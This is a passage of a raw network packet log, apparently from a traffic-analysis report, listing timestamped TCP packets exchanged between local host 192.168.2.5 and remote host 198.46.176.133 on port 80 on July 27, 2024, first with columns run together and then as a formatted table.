                                                        Jul 27, 2024 13:31:00.788893938 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.788902044 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.788909912 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.788914919 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.788925886 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.788940907 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.788954973 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.788957119 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.788970947 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.788980007 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.788985968 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.789015055 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.789844990 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.789860964 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.789875984 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.789891005 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.789894104 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.789906979 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.789921999 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.789922953 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.789938927 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.789946079 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.789956093 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.789972067 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.789988041 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.789989948 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.790007114 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.790023088 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.790026903 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.801311970 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.801321030 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.801330090 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.801347017 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.801363945 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.801381111 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.801388979 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.801398039 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.801398039 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.801417112 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.801434994 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.801440954 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.801454067 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.801470995 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.801472902 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.801489115 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.801507950 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.801508904 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.801527023 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.801543951 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.801547050 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.801563025 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.801579952 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.801584005 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.801618099 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.802174091 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802191973 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802207947 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802225113 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802237034 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.802243948 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802262068 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802272081 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.802278996 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802295923 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802308083 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.802313089 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802330971 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802339077 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.802356005 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802371979 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.802385092 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802402020 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802418947 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802429914 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.802434921 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802453995 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802462101 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.802474976 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802493095 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802503109 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.802510977 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802529097 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802534103 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.802545071 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.802584887 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.803112030 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803150892 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803164959 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.803169012 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803195000 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803211927 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803216934 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.803230047 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803246975 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803251028 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.803266048 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803280115 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.803282976 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803302050 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803319931 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803324938 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.803337097 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803354025 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803360939 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.803375959 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803392887 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803395987 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.803411007 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803431988 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.803445101 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803463936 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803481102 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803491116 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.803499937 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803518057 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803525925 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.803560972 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.803893089 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803910971 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803927898 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803946972 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803956985 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.803967953 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803985119 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.803994894 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.804028034 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804033041 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.804054976 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804070950 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804088116 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804100990 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.804105997 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804124117 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804132938 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.804164886 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804173946 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.804183960 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804200888 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804219007 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804229975 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.804234982 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804253101 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804263115 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.804270983 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804286957 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804292917 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.804305077 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804323912 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804331064 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.804342031 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804359913 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804362059 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.804378986 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804397106 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804399014 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.804414988 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804433107 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804438114 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.804450035 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804469109 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804476023 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.804507971 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804510117 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.804889917 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804908037 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804925919 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804943085 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804938078 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.804960012 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.804970980 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805005074 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805036068 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805078983 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805095911 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805113077 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805126905 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805130959 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805147886 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805157900 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805164099 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805181980 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805186033 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805200100 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805217028 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805222034 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805236101 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805253029 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805255890 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805269957 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805289030 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805291891 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805306911 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805325031 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805326939 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805342913 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805361032 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805366993 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805407047 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805627108 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805644989 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805660963 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805677891 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805685997 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805696011 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805712938 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805723906 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805752993 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805763006 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805779934 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805797100 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805814028 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805823088 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805831909 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805850029 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805857897 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805866957 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805883884 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805888891 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805902004 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805919886 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805923939 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805938005 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805954933 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805962086 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.805972099 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805989027 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.805994034 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.806006908 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806024075 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806025028 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.806041956 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806058884 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806066036 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.806077003 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806093931 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806097984 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.806111097 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806129932 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806133032 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.806170940 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.806425095 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806452990 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806468964 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806484938 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806499958 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.806500912 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806519032 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806529999 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.806536913 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806555033 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806559086 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:00.806571960 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:00.806590080 CEST8049704198.46.176.133192.168.2.5
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Jul 27, 2024 13:31:00.806592941 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.806607962 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.806629896 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.806643009 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.806660891 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.806677103 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.806687117 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.806693077 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.806711912 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.806719065 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.806730032 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.806746960 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.806756973 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.806765079 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.806788921 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.807203054 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807219982 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807235956 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807251930 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.807252884 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807271957 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807271957 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.807290077 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807307959 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807316065 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.807326078 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807343960 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807357073 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.807362080 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807378054 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807389975 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.807394981 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807411909 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807423115 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.807430983 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807446957 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807456970 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.807465076 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807480097 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807492018 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.807497978 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807523966 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.807832003 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807847023 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807861090 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807874918 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.807883024 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.807898998 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.807990074 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808006048 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808020115 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808033943 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808036089 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.808049917 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808054924 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.808065891 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808080912 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808092117 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.808096886 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808111906 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808125019 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.808128119 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808144093 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808152914 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.808159113 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808175087 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808186054 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.808191061 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808204889 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808218956 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.808248043 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.808736086 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808767080 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808782101 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808799028 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808814049 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808819056 CEST  49704        80         192.168.2.5      198.46.176.133
Jul 27, 2024 13:31:00.808830023 CEST  80           49704      198.46.176.133   192.168.2.5
Jul 27, 2024 13:31:00.808831930 CEST  49704        80         192.168.2.5      198.46.176.133
